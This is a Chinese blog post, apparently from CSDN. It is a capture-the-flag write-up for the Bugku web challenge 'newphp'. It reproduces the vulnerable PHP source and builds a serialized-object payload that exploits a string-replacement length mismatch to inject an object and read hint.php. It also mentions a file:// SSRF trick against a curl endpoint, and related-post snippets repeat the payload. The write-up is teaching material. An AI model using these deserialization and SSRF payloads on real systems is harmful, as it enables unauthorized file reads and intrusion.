BUGKU_WEB_newphp

于 2022-07-29 16:45:04 发布
阅读量167 收藏
点赞数
文章标签: 前端 php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_50076644/article/details/126059222
版权

拿到题目

 <?php
// php版本:5.4.44
header("Content-type: text/html; charset=utf-8");
highlight_file(__FILE__);

class evil{
    public $hint;

    public function __construct($hint){
        $this->hint = $hint;
    }

    public function __destruct(){
    if($this->hint==="hint.php")
            @$this->hint = base64_encode(file_get_contents($this->hint)); 
        var_dump($this->hint);
    }

    function __wakeup() { 
        if ($this->hint != "╭(●`∀´●)╯") { 
            //There's a hint in ./hint.php
            $this->hint = "╰(●’◡’●)╮"; 
        } 
    }
}

class User
{
    public $username;
    public $password;

    public function __construct($username, $password){
        $this->username = $username;
        $this->password = $password;
    }

}

function write($data){
    global $tmp;
    $data = str_replace(chr(0).'*'.chr(0), '\0\0\0', $data);
    $tmp = $data;
}

function read(){
    global $tmp;
    $data = $tmp;
    $r = str_replace('\0\0\0', chr(0).'*'.chr(0), $data);
    return $r;
}

$tmp = "test";
$username = $_POST['username'];
$password = $_POST['password'];

$a = serialize(new User($username, $password));
if(preg_match('/flag/is',$a))
    die("NoNoNo!");

unserialize(read(write($a)));

看到源码就明白,是很常规的逃逸题目了。

这道题要用到evil这个类,但是这个完全没有入口。

入口为username和password的user类。

然后关键点在于:

function write($data){
    global $tmp;
    $data = str_replace(chr(0).'*'.chr(0), '\0\0\0', $data);
    $tmp = $data;
}

function read(){
    global $tmp;
    $data = $tmp;
    $r = str_replace('\0\0\0', chr(0).'*'.chr(0), $data);
    return $r;
}

也就是6字符的\0\0\0,转换为3字符的chr(0)*chr(0),这就有了差异,所以就会有了逃逸。

$a = new evil('hint.php');
$c = serialize($a);
print_r($c);
//O:4:"evil":1:{s:4:"hint";s:8:"hint.php";}

需要将上面的进行逃逸。随便输入一个username为admin,然后将序列化内容带入password:

//O:4:"User":2:{s:8:"username";s:5:"admin";s:8:"password";s:41:"O:4:"evil":1:{s:4:"hint";s:8:"hint.php";}";}

也就是从左到右吞,将:

吞掉。这一共是23个字符,因为每6个会转换为3个,所以要是3的倍数。加一个1,变成24个。然后又因为需要闭合,所以需要加 "; 这两个符号。最后结果为:

//O:4:"User":2:{s:8:"username";s:5:"admin";s:8:"password";s:41:"1";O:4:"evil":1:{s:4:"hint";s:8:"hint.php";}";}

 

是为24字符+2闭合符号。

24个字符,也就是8组\0\0\0,传参

解码base64得:

index.cgi,访问,得到:

看到curl和url,感觉像是ssrf,试试。但是回显感觉又不是。然后不知道怎么做了。

看到wp知道,直接file://协议,但是前面得加空格。因为是curl命令,所以得加空格?不知道这么理解对不对。

然后:

 

 

 

 

风驰电掣树袋熊
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Bugku--newphp_WP
lzu_lfl的博客
11-13 413
字符串逃逸(多变少)、ssrf
newphp Bugku详解
最新发布
weixin_73560599的博客
08-11 132
字符串逃逸(缩小) 反序列化 SSRF
bugku】-newphp
weixin_52116519的博客
04-05 1780
可以看这篇文章 考点:PHP序列化逃逸+ssrf 1、 审代码 2、 PHP反序列化字符串逃逸的条件:先进行序列化,再进行字符串替换。 所以需要反序列化出一个evil()类。而字符串逃逸可以。 浅析php反序列化字符串逃逸 3、 思路 4、 payload username=\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0&password=a";O:4:"evil":2:{s:4:"hint";s:8:"hint.php";} 5、 bas
ctf-web-newphp
god_001的博客
04-30 625
题目地址:跳转提示 打开题目网址后,发现出现一段php代码: <?php // php版本:5.4.44 header("Content-type: text/html; charset=utf-8"); highlight_file(__FILE__); class evil{ public $hint; public function __construct($hint){ $this->hint = $hint; } pu.
bugku newphp
qq_50613938的博客
10-25 348
<?php // php版本:5.4.44 header("Content-type: text/html; charset=utf-8"); highlight_file(__FILE__); class evil{ public $hint; public function __construct($hint){ $this->hint = $hint; } public function __destruct(){//读取函数...
New folder_htmlweb_NEW_
10-02
some little homework
QQSoftDownloader_v1.1_webnew[email protected]
09-26
QQSoftDownloader_v1.1_webnew[email protected]
test_web_new
03-30
test_web_new
new_toolsnew_tools
09-17
new_toolsnew_tools
phpnewtpl.rar_WEB开发_PHP_
08-11
PHPnew 是一款PHP模板引擎,本次更新在结构上有较大变化,使其速度及效率都有明显的提高。同时为程序开发配备常用函数及设置,开发中仅需要直接采用即可。
Bugku WEB newphp
qq_41696858的博客
07-23 532
这题确实对的起他的位置 字符串逃逸加ssrf 关于字符串逃逸呢,建议看这篇文章,用例写的比较简单,适合新手 https://blog.csdn.net/qq_43431158/article/details/108210822 简单一句话来说,就是先序列化,再过滤的话,如果你的过滤规则让字符变多的话,可以通过payload带过去一个属性,覆盖掉你原来的属性 举个简单的例子,原先的属性1:x(17个)+带过去的属性s:1:“a”;s:1:“b”;}(17个字符)原先的属性2 s:1:“a”;s:1:“c”;(
bugku web newphp
m0_58189778的博客
08-19 551
题目:newphp 知识点:php反序列化字符串逃逸、php伪协议 工具:无 前提知识的介绍: php反序列化字符串逃逸: https://blog.csdn.net/qq_43431158/article/details/108210822 php伪协议: https://blog.csdn.net/nzjdsds/article/details/82461043?utm_medium=distribute.pc_relevant.none-task-blog-2~default~baid.
bugku newphp(字符逃逸与ssrf)
m0_62422842的博客
05-30 559
审计代码,题目中给了hint.php,所以我们的目标就是读取到hint.php的内容。本题的入口就是post传参。我们可以构造evil类的序列化字符串来读取hint.php。但是post传的是User类的两个参数,并且会序列化User这个类。这么做有什么影响呢?
newbugku部分web题解
qq_41642815的博客
04-28 2566
web1 题目代码 看到extract函数,联想到常见的变量覆盖漏洞 根据我以前写的文章 点击链接 可以构造$b为任意值,后面判断了a和c是否相等,可以使用伪协议来做 web11 打开题目显示如下 标题为robots,尝试访问robots.txt,访问后提示我们shell.php 访问shell.php 这块校验和西湖论剑的留言板题目很像,爆破脚本 import hashlib def ...
bugku-welcome to bugkuctf(PHP伪协议&PHP反序列化综合运用)
烟敛寒林的博客
04-26 1232
1.通过php://input对变量输入内容,让file_get_contents能够读取变量的内容 2.通过php://filter/read=convert.base64-encode/resource=xxx.php得到其他PHP文件的源代码 3.通过反序列化,对echo的魔术方法__tostring()里面的参数进行赋值 题目地址:http://123.206.87.240...
BugKu-web篇-聪明的php
jiuyongpinyin的博客
06-03 442
聪明的php 这道题看了大佬的WP才知道是php的模板注入,下面附上大佬的WP https://blog.csdn.net/weixin_49633310/article/details/114919263 首先是随便传入一个变量,获取源码 然后是验证存在模板注入 接下来由于system被过滤了,所以使用passthru 接下来经过经过查找,在根目录下发现了一个可疑文件 由于cat 被过滤了,可以使用: tac tail head more less 来查看文件,这里使用tac查看,得到flag
newbugku web部分write up
weixin_43601448的博客
08-02 493
刚开始写博客,把以前印象笔记的wp搬上来,顺序很乱 00x0 web10 打开源代码,看到一串疑似Base64加密,解出来是乱码,再试试base32,出来这个 登陆之后发现了这个框 百度发现vim在异常退出时会生成swp文件,直接加后缀下载,改成txt jwt的key拿到手了,可以伪造,然后iat是当前gmt时间值,没想到啥好办法,python生成当前时间同时秒表计时,然后伪造时候写一分钟后...
php ctf题解,[极客大挑战 2019]PHP CTF题解与分析
weixin_33999969的博客
03-11 535
知识点php序列化与反序列化序列化:函数为serialize(),把复杂的数据类型压缩到一个字符串中 数据类型可以是数组,字符串,对象等反序列化:函数为unserialize(),将字符串转换成变量或对象的过程常用的魔术方法:__construct():创建对象时初始化,当一个对象创建时被调用__wakeup() 使用unserialize时触发__sleep() 使用serialize时触发__...
CTFSHOW 反序列化篇
热门推荐
羽的博客
12-11 1万+
web254 没搞懂和反序列化有啥关系,直接传username=xxxxxx&password=xxxxxx出flag web255 请求包内容如下 首先get传的username和password都是xxxxxx 因为源码里面 $user = unserialize($_COOKIE['user']); $user->login($username,$password); 就是是说我们需要让反序列后的结果是ctfShowUser的实例化对象。又因为只有$this->isVip是tr
openssl_pkey_new php
06-07
`openssl_pkey_new` 是 PHP 中的一个函数,用于生成一个新的公私钥对。该函数可以接受一个关联数组作为参数,用于指定生成的密钥的算法和长度等信息。例如: ```php $config = array( 'private_key_bits' => 2048,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值